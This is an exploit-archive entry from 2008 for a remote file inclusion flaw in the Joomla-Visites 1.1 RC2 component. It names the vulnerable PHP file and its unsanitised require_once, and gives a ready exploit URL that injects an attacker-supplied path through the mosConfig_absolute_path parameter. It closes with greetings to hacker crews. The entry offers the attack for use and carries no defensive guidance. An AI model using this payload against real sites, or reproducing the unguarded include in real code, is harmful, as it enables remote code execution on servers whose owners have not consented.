Joomla Component Joomla-Visites 1.1 RC2 RFI Vulnerability

2008-04-25T00:00:00
ID 1337DAY-ID-2918
Type zdt
Reporter NoGe
Modified 2008-04-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
Joomla Component Joomla-Visites 1.1 RC2 RFI Vulnerability
=========================================================



/===============================================================================================================================================\
  |																		  |
  |  [o] Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability										  |
  |																		  |
  |       Software : com_joomla-visites version 1.1 RC2												  |
  |       Vendor   : http://www.joomla-visites.net/												  |
  |       Author   : NoGe															  |
  |																		  |
  |===============================================================================================================================================|
  |																		  |
  |  [o] Vulnerable file															  |
  |																		  |
  |       administrator/components/com_joomla-visites/core/include/myMailer.class.php								  |
  |																		  |
  |        require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php';							  |
  |																		  |
  |																		  |
  |																		  |
  |  [o] Exploit																  |
  |																		  |
  |       http://localhost/[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]  |
  |																		  |
  |===============================================================================================================================================|
  |																		  |
  |  [o] Greetz																	  |
  |																		  |
  |       all crew #papuahacker #nyubicrew #baliemhackerlink											  |
  |       skulmatic olibekas ulga Cungkee nyubi k1tk4t LoCK3R culun_borneo							                  |
  |       yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ str0ke										  |
  |																		  |
  \===============================================================================================================================================/




#  0day.today [2018-03-05]  #